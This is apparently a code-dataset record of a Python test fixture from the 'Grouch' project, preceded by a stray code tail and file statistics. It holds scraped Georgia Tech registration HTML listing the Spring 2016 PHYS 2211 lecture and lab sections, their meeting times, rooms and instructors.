stel_data[item+'_p1'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_p2'] = np.squeeze(stel_data[item][:,:,4])
return stel_data;
| 57.698492 | 148 | 0.575814 | 3,067 | 22,964 | 4.017281 | 0.093577 | 0.294132 | 0.431458 | 0.233179 | 0.793686 | 0.767551 | 0.739469 | 0.725996 | 0.705949 | 0.531207 | 0 | 0.020578 | 0.221259 | 22,964 | 397 | 149 | 57.843829 | 0.6684 | 0.026171 | 0 | 0.456522 | 0 | 0 | 0.109231 | 0.001298 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008152 | false | 0 | 0.021739 | 0 | 0.038043 | 0.005435 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dbb6c79953e9316cd71cc752180fd0b2f4ef20dc | 113,870 | py | Python | grouch/test/PHYS2211.py | atlant04/Grouch | 9a004c658214494ec70e09d888375a35a43712af | [
"MIT"
] | 7 | 2016-08-22T18:33:07.000Z | 2019-02-09T23:49:25.000Z | grouch/test/PHYS2211.py | atlant04/Grouch | 9a004c658214494ec70e09d888375a35a43712af | [
"MIT"
] | 3 | 2016-08-18T03:20:25.000Z | 2019-08-02T02:38:44.000Z | grouch/test/PHYS2211.py | atlant04/Grouch | 9a004c658214494ec70e09d888375a35a43712af | [
"MIT"
] | 2 | 2018-11-08T15:13:33.000Z | 2020-05-23T21:23:32.000Z | body = str("""
<div class="pagebodydiv">
<!-- ** END OF twbkwbis.P_OpenDoc ** -->
<br>
<div class="infotextdiv"><table class="infotexttable" summary="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><><tr><td class="indefault"><img src="/wtlgifs/twgginfo.gif" alt="Information" class="headerImg" title="Information" name="Info" hspace="0" vspace="0" border="0" height="24" width="27"></td><td class="indefault"><span class="infotext"> <b><font color="FF0000">Click the title of the course to view available seats, restrictions, etc.</font> <br><br>
<b>Calendars and general registration information are located at www.registrar.gatech.edu.
</b> <br><br>
<b>
Please note the Schedule of Classes is subject to change. Continue to monitor the course offerings and your registration status in OSCAR, and consult with your advisor if needed.
</b></b></span></td></tr></></table><p></p></div>
<input type="hidden" name="sel_crn" value="dummy">
<input type="hidden" name="assoc_term_in" value="dummy">
<input type="hidden" name="ADD_BTN" value="dummy">
<table class="datadisplaytable" summary="This layout table is used to present the sections found" width="100%"><caption class="captiontext">Sections Found</caption>
<><tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21018">Intro Physics I - 21018 - PHYS 2211 - B</a></th>
</tr>
<tr>
<td class="dddefault">
Students must also register for a Lab Section that begins
with the letter B. No lab exemptions are offered.
This class will have evening tests approximately once every
three weeks.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">11:05 am - 11:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Martin Michael Jarrio (<abbr title="Primary">P</abbr>)<a href="mailto:martin.jarrio@physics.gatech.edu" target="Martin M. Jarrio"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Martin Michael Jarrio (<abbr title="Primary">P</abbr>)<a href="mailto:martin.jarrio@physics.gatech.edu" target="Martin M. Jarrio"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20998">Intro Physics I - 20998 - PHYS 2211 - B01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 1:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20999">Intro Physics I - 20999 - PHYS 2211 - B02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21000">Intro Physics I - 21000 - PHYS 2211 - B03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 127</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21001">Intro Physics I - 21001 - PHYS 2211 - B04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21002">Intro Physics I - 21002 - PHYS 2211 - B05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 125</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">1:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21003">Intro Physics I - 21003 - PHYS 2211 - B06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 4:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21032">Intro Physics I - 21032 - PHYS 2211 - B07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">1:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21320">Intro Physics I - 21320 - PHYS 2211 - B08</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 4:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22033">Intro Physics I - 22033 - PHYS 2211 - B09</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
